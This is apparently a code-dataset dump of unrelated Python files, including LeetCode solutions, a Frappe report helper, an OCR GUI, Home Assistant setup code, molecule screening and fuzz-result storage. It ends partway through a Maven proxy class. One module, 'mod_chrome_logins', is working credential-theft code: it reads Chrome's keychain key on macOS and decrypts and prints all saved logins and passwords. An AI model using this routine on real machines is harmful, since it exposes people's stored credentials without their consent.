content
stringlengths 5
1.05M
|
---|
import sys
class Solution:
    """Compute the diameter (longest path in edges) of a binary tree."""

    def diameterOfBinaryTree(self, root: "TreeNode") -> int:
        """Return the number of edges on the longest path between any two nodes.

        Annotations are quoted forward references so the class can be defined
        even when TreeNode is declared elsewhere (or injected by the judge).
        """
        self.curMax = 0  # best (left depth + right depth) seen so far
        self.postOrder(root)
        return self.curMax

    def postOrder(self, root: "TreeNode") -> int:
        """Return the depth of *root* while updating self.curMax."""
        if not root:
            return 0
        left = self.postOrder(root.left)
        right = self.postOrder(root.right)
        # The longest path through this node chains the deepest branch on each side.
        self.curMax = max(self.curMax, left + right)
        return max(left, right) + 1
# Marcelo Campos de Medeiros
# ADS UNIFIP 2020.1
# 3 Lista
# Patos-PB maio/2020
'''
Escreva um programa que leia 2 valores X e Y e que imprima todos os valores entre eles cujo resto da
divisão dele por 5 for igual a 2 ou igual a 3.
Entrada
O arquivo de entrada contém 2 valores positivos inteiros quaisquer, não necessariamente em ordem crescente.
Saída
Imprima todos os valores conforme exemplo abaixo, sempre em ordem crescente.
Sample Input Sample Output
10 12
18 13
17
'''
# Read the two integer values X and Y ("leia 2 valores X e Y").
x = int(input())
y = int(input())
# Order the pair so that "a" is the smaller and "b" the larger value.
# The original re-tested the inverse condition instead of using else.
if x > y:
    a, b = y, x
else:
    a, b = x, y
# Print every value strictly between a and b whose remainder mod 5 is 2 or 3,
# always in ascending order.
for value in range(a + 1, b):
    if value % 5 in (2, 3):
        print(value)
|
import frappe
from frappe.utils import time_diff_in_hours
def get_tat_for_closed_ticket(start, end):
    """Return turnaround-time chart data for Requests closed between start and end.

    Fetches all "Request" documents whose start and end dates fall inside the
    window and whose status is "Close", then aggregates them via prepare_data().
    Returns None when the query fails.
    """
    filters = [
        ["Request", "start_date", ">=", start],
        ["Request", "start_date", "<=", end],
        ["Request", "end_date", ">=", start],
        ["Request", "end_date", "<=", end],
        ["Request", "request_status", "=", "Close"],
    ]
    fields = [
        "end_date",
        "start_date",
        "department_abbriviation",
    ]
    try:
        results = frappe.get_all("Request", fields=fields, filters=filters)
        return prepare_data(results)
    except Exception:
        # `except Exception, e` was Python-2-only syntax and `e` was unused;
        # this form runs on both interpreters. Best-effort: report shows empty.
        return None
def get_leagend(start, end):
    """Map the duration between *start* and *end* to a report legend bucket."""
    hours = time_diff_in_hours(end, start)
    # Ascending (upper-bound, label) pairs; first bucket that fits wins.
    buckets = (
        (24.0, "Winthin 1 day"),
        (72.0, "2-3 days"),
        (120.0, "3-5 days"),
        (168.0, "5-7 days"),
    )
    for limit, label in buckets:
        if hours <= limit:
            return label
    return "more than 7 days"
def prepare_data(results):
    """Aggregate closed-request records into Google-Chart-style rows.

    results example:
        [{'department_abbriviation': u'ACC',
          'end_date': datetime.datetime(2016, 2, 10, 15, 27, 46),
          'start_date': datetime.datetime(2016, 2, 10, 14, 38, 7, 34947)}]

    Returns None for empty input, otherwise {"requests": rows, "table": rows
    transposed} where the first row is the chart header.
    """
    if not results:
        return None
    requests = {}          # dept -> {legend bucket -> count}
    total_tickets = 0
    within_day = 0
    two_three_days = 0
    three_five_days = 0
    five_seven_days = 0
    more_than_seven = 0
    for record in results:
        dept = record.get("department_abbriviation")
        closed_in = get_leagend(record.get("start_date"), record.get("end_date"))
        count = 1
        if requests.get(dept):
            rec = requests.get(dept)
            count = rec.get(closed_in) + 1 if rec.get(closed_in) else 1
            requests.get(dept).update({closed_in: count})
        else:
            requests.update({dept: {closed_in: count}})
        total_tickets += count
        if closed_in == "Winthin 1 day":
            within_day += count
        elif closed_in == "2-3 days":
            two_three_days += count
        elif closed_in == "3-5 days":
            three_five_days += count
        elif closed_in == "5-7 days":
            five_seven_days += count
        else:
            more_than_seven += count
    data = [["Genre", "Winthin 1 day", "2-3 days", "3-5 days", "5-7 days", "more than 7 days", {"role": "annotation"}]]
    # .items() (not the Python-2-only .iteritems()) keeps this working on 2 and 3.
    chart_data = [[key, request.get("Winthin 1 day") or 0, request.get("2-3 days") or 0,
                   request.get("3-5 days") or 0, request.get("5-7 days") or 0,
                   request.get("more than 7 days") or 0, ""]
                  for key, request in requests.items()]
    data.extend(chart_data)
    data.append(["Total", within_day, two_three_days, three_five_days, five_seven_days, more_than_seven, ""])
    return {
        "requests": data,
        "table": list(zip(*data)),
    }
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
editor: Aldrich
version: 21.121_released
description: A tool that can import a picture to convenient text.
"""
# Copyright 2021 (C) Aldrich | All Rights Reserved.
# Please download the model files and move them to "C://Users//YourName//.EasyOCR" use before.
# If your computer have CUDA, that'll dispose more faster.
# Main Libraries
from tkinter import *
import easyocr
# Other Libraries
import tkinter.messagebox
import tkinter.ttk
import pyperclip
import shutil
import windnd
import os
def file_message(files):  # Process a dropped file
    """Handle files dropped onto the window: confirm, validate, then run OCR."""
    filename = ''.join((item.decode('gbk') for item in files))  # Process file path
    message = ('确认您的文件为:', filename)
    make_sure = tkinter.messagebox.askquestion('提示', message)  # Confirm file path
    # askquestion returns the *string* 'yes' or 'no'; the original truthiness
    # test treated both answers as confirmation.
    if make_sure == 'yes':
        if filename.endswith(('jpg', 'png', 'jpeg', 'bmp')):  # Check the file
            if os.getcwd() in filename:
                n_filename = filename.replace(os.getcwd(), '')[1:]
            else:
                # Copy the image next to the script so OCR gets a short path.
                ex = os.path.splitext(filename)[1]
                shutil.copyfile(filename, rf'temp{ex}')
                n_filename = rf'temp{ex}'
            ocr_main(n_filename)  # Pass parameters to run the function
        else:
            tkinter.messagebox.showerror('错误', '不支持此格式!')
    else:
        pass
def ocr_main(files):  # Text recognition and display
    """Run OCR on the image at path *files* and show the lines in a listbox."""
    reader = easyocr.Reader(['ch_sim', 'en'])
    result = reader.readtext(f'{files}', detail=0)  # Writes the picture to memory

    def copy_all():
        # Copy every recognized line to the clipboard.
        pyperclip.copy(''.join(result))

    window.geometry('635x300+500+300')
    window.resizable(True, True)
    label.grid_remove()
    btn1 = tkinter.Button(window, text='复制全部', font=('微软雅黑', 12), command=copy_all, width=10)
    btn1.grid(row=2, column=0, sticky=tkinter.W)
    lis = tkinter.Listbox(window, font=('微软雅黑', 12), width=70, height=11)
    lis.grid(row=1, columnspan=3, sticky=tkinter.W)
    lis.delete(0, tkinter.END)
    # The original while-loop counted up to len(result) + 1 and indexed
    # result[len(result)], raising IndexError; enumerate stops at the last line.
    for row_index, line in enumerate(result):
        lis.insert(row_index, line)
# Root window: a fixed 300x300 drop target until OCR results resize it.
window = Tk()
window.title('OCR图片转文字工具')
window.geometry('300x300')
window.resizable(0, 0)
# Register the drag-and-drop handler for files dropped onto the window.
windnd.hook_dropfiles(window, func=file_message)
# Placeholder prompt shown until an image is dropped (removed by ocr_main).
label = tkinter.Label(window, text='\n\n\n\n\n请将图片拖入此处\n(图片格式:.png、.jpg、.jpeg、.bmp)', font=('微软雅黑', 12))
label.grid(row=0, column=0, sticky=tkinter.W)
window.mainloop()
|
import time
def wait_pipe_len(sock, expected, timeout=10):
    """
    Wait up to ``timeout`` seconds for the length of sock.pipes to become
    ``expected`` value. This prevents hardcoding sleep times, which should be
    pretty small for local development but potentially pretty large for CI
    runs.
    """
    deadline = time.time() + timeout
    while len(sock.pipes) != expected:
        if time.time() >= deadline:
            break
        time.sleep(0.002)
    return len(sock.pipes) == expected
|
import os
from datetime import datetime
from urllib.request import urlretrieve
from zipfile import ZipFile
from ndj_toolbox.fetch import (xml_df_internal, save_files)
# ALESP open-data repository base URL and the specific dataset archive.
url_base = 'http://www.al.sp.gov.br/repositorioDados/'
url_file = 'processo_legislativo/documento_regime.zip'
url = url_base + url_file
def main():
    """Download, extract and normalize the ALESP 'documento_regime' dataset."""
    hoje = datetime.strftime(datetime.now(), '%Y-%m-%d')
    DATA_DIR = f'data_{hoje}'
    # urlretrieve does not create directories; ensure the dated output
    # directory exists before downloading into it.
    os.makedirs(DATA_DIR, exist_ok=True)
    urlretrieve(url, f'{DATA_DIR}/documento_regime.zip')
    # Extract the XML payload and drop the archive.
    with ZipFile(f'{DATA_DIR}/documento_regime.zip', 'r') as zip_file:
        zip_file.extractall(f'{DATA_DIR}')
    os.remove(f'{DATA_DIR}/documento_regime.zip')
    xml_data = f'{DATA_DIR}/documento_regime.xml'
    dataset = xml_df_internal(xml_data).process_data()
    # Keep only the relevant columns and rename them to snake_case.
    dataset = dataset[[
        'IdDocumento', 'IdRegime', 'NomeRegime', 'DataInicio', 'DataFim'
    ]]
    dataset = dataset.rename(columns={
        'IdDocumento': 'id_documento',
        'IdRegime': 'id_regime',
        'NomeRegime': 'nm_regime',
        'DataInicio': 'dt_inicio',
        'DataFim': 'dt_fim'
    })
    save_files(dataset, 'documentos_regimes_tramitacao')
    os.remove(xml_data)


if __name__ == '__main__':
    main()
|
"""
This component is an upgraded version of file sensor.
It has the same characteristics but it:
- expect a vecotr of data read from file in order to be able to interpret it.
- vector lenght is dependant to information of setup.
- It has an additional property that return the whole vector read.
"""
import os
import logging
import asyncio
from homeassistant import config_entries
from homeassistant.config_entries import (
SOURCE_IMPORT,
ConfigEntry
)
from homeassistant.helpers import discovery
from homeassistant.util import Throttle
from .sensor import FileSensor
from .const import (
VERSION,
DOMAIN,
PLATFORM,
ISSUE_URL,
CONFIGFLOW_VERSION
)
_LOGGER = logging.getLogger(__name__)
async def async_setup(hass, config):
    """YAML setup entry point; actual configuration happens via the UI flow."""
    _LOGGER.info("Set up of integration %s, version %s, in case of issue open ticket at %s", DOMAIN, VERSION, ISSUE_URL)
    return True
async def async_setup_entry(hass, config_entry):
    """Set up this integration using UI."""
    if config_entry.source == config_entries.SOURCE_IMPORT:
        # We get here if the integration is set up using YAML
        hass.async_create_task(hass.config_entries.async_remove(config_entry.entry_id))
        return True
    # Register the options-update listener. The returned unsubscribe callback
    # was previously bound to an unused local; the registration side effect is
    # what matters here.
    config_entry.add_update_listener(update_listener)
    _LOGGER.info("Added new FileRestore entity, entry_id: %s", config_entry.entry_id)
    hass.async_create_task(hass.config_entries.async_forward_entry_setup(config_entry, PLATFORM))
    return True
async def async_unload_entry(hass, config_entry):
    """Unload a config entry."""
    _LOGGER.debug("async_unload_entry: %s", config_entry)
    # There is only one platform to unload, so await it directly instead of
    # wrapping the single coroutine in asyncio.gather().
    await hass.config_entries.async_forward_entry_unload(config_entry, PLATFORM)
    return True
async def update_listener(hass, config_entry):
    """Handle options update."""
    _LOGGER.debug("update_listener: %s", config_entry)
    # Reload the entry so changed options take effect immediately.
    await hass.config_entries.async_reload(config_entry.entry_id)
async def async_migrate_entry(hass, config_entry: ConfigEntry):
    """Migrate old entry."""
    _LOGGER.debug("Migrating from version %s to version %s", config_entry.version, CONFIGFLOW_VERSION)
    new_data = {**config_entry.data}
    # new_options is built but not applied below — presumably kept for a future
    # migration step; confirm before removing.
    new_options = {**config_entry.options}
    if config_entry.version == 1:
        # NOTE(review): assigning config_entry.unique_id/version/data directly
        # bypasses hass.config_entries.async_update_entry; confirm this still
        # works on current Home Assistant cores, which treat these as read-only.
        config_entry.unique_id = config_entry.data["unique_id"]
        del new_data["unique_id"]
        config_entry.version = CONFIGFLOW_VERSION
        config_entry.data = {**new_data}
        _LOGGER.info("Migration of entry %s done to version %s", config_entry.title, config_entry.version)
        return True
    _LOGGER.info("Migration not required")
    return True
|
# -*- coding: utf-8 -*-
def main():
    """Solve a three-line verbal-arithmetic puzzle (s1 + s2 == s3).

    Reads three letter strings from stdin, tries digit assignments over the
    distinct letters, and prints the three numbers or UNSOLVABLE.
    """
    from itertools import permutations
    import sys
    input = sys.stdin.readline
    s1 = list(input().rstrip())
    s2 = list(input().rstrip())
    s3 = list(input().rstrip())
    # Distinct letters; iteration order is whatever the set yields, exactly
    # as in the original search.
    letters = set(s1) | set(s2) | set(s3)
    if len(letters) > 10:
        print("UNSOLVABLE")
        exit()
    for digits in permutations(range(10), r=len(letters)):
        mapping = {letter: str(digit) for letter, digit in zip(letters, digits)}
        n1 = "".join(mapping[ch] for ch in s1)
        n2 = "".join(mapping[ch] for ch in s2)
        n3 = "".join(mapping[ch] for ch in s3)
        # Leading zeros are not allowed in any of the three numbers.
        if n1[0] == "0" or n2[0] == "0" or n3[0] == "0":
            continue
        if int(n1) + int(n2) == int(n3):
            print("\n".join([n1, n2, n3]))
            exit()
    print("UNSOLVABLE")
|
"""
# Definition for a Node.
class Node(object):
def __init__(self, val, children):
self.val = val
self.children = children
"""
class Solution(object):
    def levelOrder(self, root):
        """
        :type root: Node
        :rtype: List[List[int]]

        Breadth-first traversal of an N-ary tree, collecting node values
        one level at a time.
        """
        if root is None:
            return []
        current_level = [root]
        levels = [[root.val]]
        while current_level:
            next_level = []
            values = []
            for node in current_level:
                for child in node.children:
                    if child is not None:
                        next_level.append(child)
                        values.append(child.val)
            current_level = next_level
            if values:
                levels.append(values)
        return levels
"""
MIT License Block
Copyright (c) 2015 Alex Barry
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import sys
import logging
import csv
import os
from ..Utils import select_files_in_folder, touch
# Populate the Base Message Global Variable
def build_msg(msg_path):
    """Read and return the base message file contents, or None on failure."""
    try:
        with open(msg_path, 'r') as handle:
            contents = handle.read()
        logging.debug("Base Message file opened")
        return contents
    except Exception as e:
        logging.error('Exception during read of base message')
        logging.error(e)
        return None
# Build a message list from a CSV
def build_msg_list_from_csv(msg, config_csv, csv_var_start, csv_var_end):
    """Build one message per CSV data row by substituting header-named variables.

    Each header cell becomes a variable token csv_var_start + header +
    csv_var_end, replaced in *msg* with the row's cell value via
    replace_variables(). Returns the list of built messages.
    """
    logging.debug("Building message list from base message and csv")
    message_list = []
    # Python 2's csv module wants binary mode; Python 3 wants text mode.
    mode = 'rb' if sys.version_info[0] < 3 else 'r'
    # The original left the file handle open; the with-block closes it
    # deterministically on every path.
    with open(config_csv, mode) as csvfile:
        logging.debug('CSV File Opened')
        reader = csv.reader(csvfile, delimiter=',', quotechar='|')
        # next() works on both Python 2 (reader.next) and 3 (reader.__next__).
        header_row = next(reader)
        logging.debug("Header row retrieved")
        for row in reader:
            repl_dict = {}
            for i in range(0, len(row)):
                logging.debug("Processing CSV Element: %s" % row[i])
                new_dict_key = "%s%s%s" % (csv_var_start, header_row[i], csv_var_end)
                repl_dict[new_dict_key] = row[i]
            message_list.append(replace_variables(msg, repl_dict))
    return message_list
# Replace a a set of variables within a message
# base_text - The message contianing variables
# variable_dict - A dictionary of variable names & values
def replace_variables(msg, variable_dict):
    """Replace every key of *variable_dict* found in *msg* with its value."""
    # Dict iteration differs between Python 2 (iteritems) and 3 (items);
    # pick the right generator at run time.
    pairs = variable_dict.iteritems() if sys.version_info[0] < 3 else variable_dict.items()
    for key, val in pairs:
        logging.debug("Replacing Variable %s with Value %s" % (key, val))
        msg = msg.replace(key, val)
    return msg
# Pass in a Session as input and output a session that has been updated
def generate_msg_list(session):
    """Populate session.msg_list, session.num_msg and session.base_msg.

    NOTE(review): *session* is read with dict-style access (session['...'])
    but written with attribute access (session.num_msg) — presumably a
    dict-like object that also exposes attributes; confirm against the
    Session implementation.
    """
    #Now, we need to determine how many messages we're sending and build them
    if session['single_message']:
        logging.debug("Building Single Message")
        session.num_msg=1
        session.base_msg = build_msg( os.path.abspath(session['msg_location']) )
        session.msg_list.append( session.base_msg )
    elif session['multi_message'] and session['include_csv']:
        logging.debug("Building Messages from CSV")
        #Pull the correct file paths
        msg_path = os.path.abspath(session['msg_location'])
        config_csv = os.path.abspath(session['csv_location'])
        session.base_msg = build_msg(msg_path)
        logging.debug("Base Message: %s" % session.base_msg)
        #Read the CSV, Build the message list, and take it's length for num_msg
        session.msg_list = build_msg_list_from_csv(session.base_msg, config_csv, session['csv_var_start'], session['csv_var_end'])
        session.num_msg=len(session.msg_list)
    elif session['multi_message']:
        logging.debug("Building Messages from Folder")
        # Collect message files with the configured extension from the folder.
        msg_folder = select_files_in_folder(os.path.abspath(session['msg_folder_location']), session['msg_extension'])
        #Build the message list
        for path in msg_folder:
            session.msg_list.append( build_msg(os.path.abspath(path)) )
        session.num_msg = len(session.msg_list)
    return session
|
import os
from os.path import expanduser
import base64
import binascii
import hmac
import itertools
import operator
import shutil
import sqlite3
import struct
import subprocess
import hashlib
from apps.server.modules.mod_interface import mod_interface
try:
    # Python 2: xrange exists natively.
    xrange
except NameError:
    # Python3 support.
    # noinspection PyShadowingBuiltins
    xrange = range
class mod_chrome_logins(mod_interface):
    """Module that copies Chrome's Login Data DB on macOS and decrypts saved
    passwords using the keychain-held safe-storage key."""

    def setup_mod(self):
        # One-time module initialisation hook.
        print(f'Module Setup (mod_chrome_logins) called successfully!')

    def pbkdf2_bin(self, password, salt, iterations, keylen=16):
        # Thanks to mitsuhiko for this function:
        # https://github.com/mitsuhiko/python-pbkdf2
        # NOTE(review): this fallback is Python-2-era code — `sha1` is not in
        # scope here (it is bound as a class attribute below, not a global),
        # and `itertools.izip` / str-based chr joins do not exist on Python 3.
        # Verify it is only reached where hashlib.pbkdf2_hmac is missing.
        _pack_int = struct.Struct('>I').pack
        hashfunc = sha1
        mac = hmac.new(password, None, hashfunc)
        def _pseudorandom(x, mac=mac):
            h = mac.copy()
            h.update(x)
            return map(ord, h.digest())
        buf = []
        for block in xrange(1, -(-keylen // mac.digest_size) + 1):
            rv = u = _pseudorandom(salt + _pack_int(block))
            for i in xrange(iterations - 1):
                u = _pseudorandom(''.join(map(chr, u)))
                rv = itertools.starmap(operator.xor, itertools.izip(rv, u))
            buf.extend(rv)
        return ''.join(map(chr, buf))[:keylen]
    try:
        from hashlib import pbkdf2_hmac
    except ImportError:
        # Python version not available (Python < 2.7.8, macOS < 10.11),
        # use mitsuhiko's pbkdf2 method.
        pbkdf2_hmac = pbkdf2_bin
    from hashlib import sha1

    def chrome_decrypt(self, encrypted, safe_storage_key):
        """
        AES decryption using the PBKDF2 key and 16x " " IV
        via openSSL (installed on OSX natively)
        Salt, iterations, iv, size:
        https://cs.chromium.org/chromium/src/components/os_crypt/os_crypt_mac.mm
        """
        # "20" repeated 16 times is the hex encoding of sixteen ASCII spaces.
        iv = "".join(("20",) * 16)
        key = hashlib.pbkdf2_hmac("sha1", safe_storage_key, b"saltysalt", 1003)[:16]
        hex_key = binascii.hexlify(key)
        hex_enc_password = base64.b64encode(encrypted[3:])
        # Send any error messages to /dev/null to prevent screen bloating up
        # (any decryption errors will give a non-zero exit, causing exception)
        try:
            # NOTE(review): shell=True with interpolated values; inputs come
            # from the local keychain and DB, but treat with care.
            strTmp = f"openssl enc -base64 -d -aes-128-cbc -iv '{iv}' -K '{hex_key}' <<< '{hex_enc_password}' 2>/dev/null"
            strTmp = strTmp.replace("'b'", "'")
            strTmp = strTmp.replace("''", "'")
            decrypted = subprocess.check_output(
                strTmp,
                shell=True)
        except subprocess.CalledProcessError:
            decrypted = "Error decrypting this data."
        return decrypted

    def run_mod(self, cmd = ""):
        """Dump Chrome saved logins, decrypting each password via chrome_decrypt."""
        # Ask the macOS keychain for Chrome's safe-storage key (may prompt).
        safe_storage_key = subprocess.Popen(
            "security find-generic-password -wa "
            "'Chrome'",
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            shell=True)
        stdout, stderr = safe_storage_key.communicate()
        if stderr:
            print("Error: {}. Chrome entry not found in keychain?".format(stderr))
        elif not stdout:
            print("User clicked deny.")
        else:
            # Trailing newline stripped from the keychain output.
            safe_storage_key = stdout[:-1]
            # Copy the Login Data DB so we never touch Chrome's live file.
            shutil.copy2(expanduser("~") + '/Library/Application Support/Google/Chrome/Default/Login Data', 'chrome_logins')
            con = sqlite3.connect('chrome_logins')
            cur = con.cursor()
            query_result = cur.execute('SELECT * FROM logins')
            for row in query_result:
                passwd = self.chrome_decrypt(row[5], safe_storage_key)
                if(row[3] != ""):
                    print(f'URL: {row[0]}:')
                    print(f'- Action-URL: {row[1]}')
                    print(f'- User: {row[3]}, Paswword: {passwd}')
                else:
                    continue
            cur.close()
            con.close()
            os.remove('chrome_logins')
            return query_result
|
# -*- coding: utf-8 -*-
"""
Filter database using Pharmacophore model.
Created on Mon Mar 16 10:11:53 2015
@author: Marta Stepniewska
"""
from pybel import readfile
from decaf import Pharmacophore
from decaf.toolkits.ob import phar_from_mol
from decaf.utils import similarity
from multiprocessing import Process, Manager, cpu_count
from time import sleep
# One worker process per CPU core.
NUM_PROCESSES = cpu_count()
# Minimum similarity score for a molecule to be kept.
cutoff = 0.8
# Input molecules (SMILES) and the pharmacophore model to screen against.
database = readfile("smi", "all.ism")
model = Pharmacophore.read("model.p")
print "Read model with %s nodes created from %s molecules." % (model.numnodes,
                                                               model.molecules)
# Manager-backed list so worker processes can append shared results.
manager = Manager()
similar = manager.list()
# One slot per worker process.
proc = [None]*NUM_PROCESSES
def check_mol(mol):
    """Score *mol* against the model; record it when similarity beats cutoff."""
    phar = phar_from_mol(mol)
    score, cost = similarity(model, phar)
    if score > cutoff:
        similar.append((mol.write(), score, cost))
# Round-robin dispatch over worker slots.
i = 0
compared = 0
while True:
    # A slot is free when it is empty or its process has finished.
    if (proc[i] is not None and not proc[i].is_alive()) or proc[i] is None:
        try:
            mol = database.next()
            compared += 1
            if compared % 10 == 0:
                print compared, "molecules comapred"
            proc[i] = Process(target=check_mol, args=(mol,))
            proc[i].start()
        except StopIteration:
            # Input exhausted: stop dispatching new workers.
            break
    i = (i + 1) % NUM_PROCESSES
print "All", compared, "molecules comapred."
# Wait for the remaining workers to finish.
# NOTE(review): if fewer molecules than NUM_PROCESSES were read, some slots
# are still None here and p.is_alive() would raise — confirm inputs are
# always larger than the pool.
for p in proc:
    while p.is_alive():
        sleep(0.1)
print "Found %s similar molecules:" % len(similar)
for s in similar:
    print "SMILES:", s[0].split()[0]
    print "description:", s[0].split("\t")[1].rstrip()
    print "score: %s, cost: %s" % (s[1:])
    print ""
|
# -*- coding: utf-8 -*-
# @Author: CodyKochmann
# @Date: 2020-04-05 11:39:37
# @Last Modified by: CodyKochmann
# @Last Modified time: 2020-04-05 12:23:59
from typing import Set, Tuple, Dict
import sqlite3, inspect, logging, unittest
'''
FuzzResult structure
{
(int, int): {
True: [
([3, 5], 8),
([1, 1], 2),
([9, 15], 24),
],
False: {}
}
(set, str): {
True: [],
False: {
(<class 'TypeError'>, ('can only concatenate str (not "set") to str',)): [
({'yolo', {2, 4, 6}})
]
}
}
}
'''
def attempt_getsource(fn):
    """Return the source of *fn*, or None when it cannot be retrieved."""
    try:
        return inspect.getsource(fn)
    except (OSError, TypeError):
        # Builtins, C extensions and non-code objects have no retrievable
        # source; a bare except here would also hide unrelated errors.
        return None
class FuzzResultDB(sqlite3.Connection):
    """SQLite connection that persists one fuzz target's FuzzResult.

    In-memory by default; pass db_path to persist to disk.
    """

    # DDL executed on every connection.
    # NOTE(review): in SQL, `x != NULL` is never true (NULL comparisons yield
    # unknown), so the CHECK below likely never rejects a row; `IS NOT NULL`
    # was probably intended — confirm before relying on it.
    schema = [
        '''
        CREATE TABLE IF NOT EXISTS fuzz_tests (
            id INTEGER PRIMARY KEY AUTOINCREMENT,
            ts TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
            target_module TEXT,
            target_function_name TEXT,
            target_function_repr TEXT,
            target_function_source TEXT
        );
        ''',
        '''
        CREATE TABLE IF NOT EXISTS test_ingest (
            test_id INTEGER REFERENCES fuzz_tests(id),
            successful BOOLEAN NOT NULL,
            input_types TEXT NOT NULL,
            input_args TEXT NOT NULL,
            output_type TEXT,
            output TEXT,
            exception_type TEXT,
            exception TEXT,
            CHECK (
                (
                    output_type != NULL AND output != NULL
                ) OR (
                    exception_type != NULL AND exception != NULL
                )
            )
        );
        '''
    ]

    def __init__(self, fuzz_target, fuzz_result: Dict, db_path=":memory:"):
        """Validate inputs, open the connection, load schema, store results."""
        # validate input
        assert callable(fuzz_target), f'FuzzResultDB assumes fuzz_target is some type of calable function - {fuzz_target}'
        assert isinstance(fuzz_result, dict), f'FuzzResultDB assumes fuzz_result will be a dict - {fuzz_result}'
        assert isinstance(db_path, str), f'FuzzResultDB assumes db_path will be a string - {db_path}'
        # initialize sqlite3.Connection components
        sqlite3.Connection.__init__(self, db_path)
        # save input for potential future reference
        self._db_path = db_path
        self._fuzz_target = fuzz_target
        self._fuzz_result = fuzz_result
        # load the base schema
        self.load_schema()
        # save the fuzz results
        self.save_results(fuzz_target, fuzz_result)

    def load_schema(self):
        """Execute every schema statement, logging and re-raising failures."""
        cursor = self.cursor()
        for command in FuzzResultDB.schema:
            try:
                list(cursor.execute(command))
            except Exception as ex:
                # NOTE(review): '%' has no conversion letter — the command is
                # never interpolated into this message; '%s' was likely meant.
                logging.exception('failed to run sql command - %', command)
                raise ex
        cursor.close()

    @property
    def test_id(self):
        """Lazily insert this target's fuzz_tests row and memoize its rowid."""
        if not hasattr(self, '_test_id'):
            cursor = self.cursor()
            self._test_id = cursor.execute(
                '''
                INSERT INTO fuzz_tests (
                    target_module,
                    target_function_name,
                    target_function_repr,
                    target_function_source
                ) VALUES (?, ?, ?, ?);
                ''',
                (
                    self._fuzz_target.__module__ if hasattr(self._fuzz_target, '__module__') else None,
                    self._fuzz_target.__name__ if hasattr(self._fuzz_target, '__name__') else None,
                    repr(self._fuzz_target),
                    attempt_getsource(self._fuzz_target)
                )
            ).lastrowid
            cursor.close()
        return self._test_id

    def save_results(self, fuzz_target, fuzz_result):
        """Insert every success and failure record from *fuzz_result*."""
        cursor = self.cursor()
        # iterate through the FuzzResult to store its tests to the db
        for type_combo, result in fuzz_result.items():
            # NOTE(review): assertEquals is the deprecated alias of
            # assertEqual, invoked on a throwaway TestCase purely for its
            # rich failure output.
            unittest.TestCase.assertEquals(unittest.TestCase(), [type(type_combo), type(result)], [tuple, dict])
            assert len(result) > 0, result
            assert len(result) <= 2, result
            if True in result and len(result[True]) > 0: # successful tests need to be stored
                list(cursor.executemany(
                    '''
                    INSERT INTO test_ingest (
                        test_id,
                        successful,
                        input_types,
                        input_args,
                        output_type,
                        output
                    ) VALUES (?, ?, ?, ?, ?, ?);
                    ''',
                    (
                        (
                            self.test_id,
                            True,
                            repr(type_combo),
                            repr(input_args),
                            repr(type(output)),
                            repr(output)
                        )
                        for input_args, output in result[True]
                    )
                ))
            if False in result and len(result[False]) > 0: # failed tests need to be stored
                list(cursor.executemany(
                    '''
                    INSERT INTO test_ingest (
                        test_id,
                        successful,
                        input_types,
                        input_args,
                        exception_type,
                        exception
                    ) VALUES (?, ?, ?, ?, ?, ?);
                    ''',
                    (
                        (
                            self.test_id,
                            False,
                            repr(type_combo),
                            repr(input_args),
                            repr(output[0]),
                            repr(output[1] if len(output)>1 else None)
                        )
                        for input_args, output in result[False]
                    )
                ))
        cursor.close()
class FuzzResult(dict):
    ''' acts as a user friendly data structure to explore fuzz results '''

    @property
    def crash_input_types(self) -> Set[Tuple[type]]:
        """Type combos that produced at least one failure."""
        return {combo for combo, outcome in self.items() if len(outcome[False]) > 0}

    @property
    def crash_input_count(self) -> int:
        """Number of type combos with at least one failure."""
        return sum(1 for outcome in self.values() if len(outcome[False]) > 0)

    @property
    def successful_input_types(self) -> Set[Tuple[type]]:
        """Type combos that produced at least one success."""
        return {combo for combo, outcome in self.items() if len(outcome[True]) > 0}

    @property
    def successful_input_count(self) -> int:
        """Number of type combos with at least one success."""
        return sum(1 for outcome in self.values() if len(outcome[True]) > 0)

    @property
    def iffy_input_types(self) -> Set[Tuple[type]]:
        """Type combos that both succeeded and failed."""
        return self.successful_input_types & self.crash_input_types

    @property
    def iffy_input_count(self) -> int:
        """Number of type combos that both succeeded and failed."""
        return sum(1 for outcome in self.values()
                   if len(outcome[True]) > 0 and len(outcome[False]) > 0)

    def __str__(self) -> str:
        return f'''
        FuzzResult:
            type_combos:
                successful: {self.successful_input_count}
                problematic: {self.crash_input_count}
                iffy: {self.iffy_input_count}
        '''.strip()
|
import os
import json
import shutil
import logging
import requests
import tempfile
from xml.etree.ElementTree import fromstring, tostring
from os.path import join, exists, basename, expanduser
from util.job_util import exec_command
from pm_proxy.pm_base import PackageManagerProxy
class MavenProxy(PackageManagerProxy):
# FIXME: maybe use curl command line to avoid being blocked (maven server blocks frequent visits)
    def __init__(self, registry=None, cache_dir=None, isolate_pkg_info=False):
        # registry: alternative registry location — NOTE(review): the helper
        # methods below hard-code repo1.maven.org, so this appears unused here;
        # confirm against the base class.
        super(MavenProxy, self).__init__()
        self.registry = registry
        self.cache_dir = cache_dir  # where per-package info files are cached
        self.isolate_pkg_info = isolate_pkg_info  # one info dir per package if True
        self.metadata_format = 'pom'  # package metadata is stored as POM XML
        self.dep_format = 'json'
def _get_versions_info(self, pkg_name):
gid, aid = pkg_name.split('/')
try:
# Maven URL for package information
# https://repo1.maven.org/maven2/com/google/protobuf/protobuf-java/maven-metadata.xml
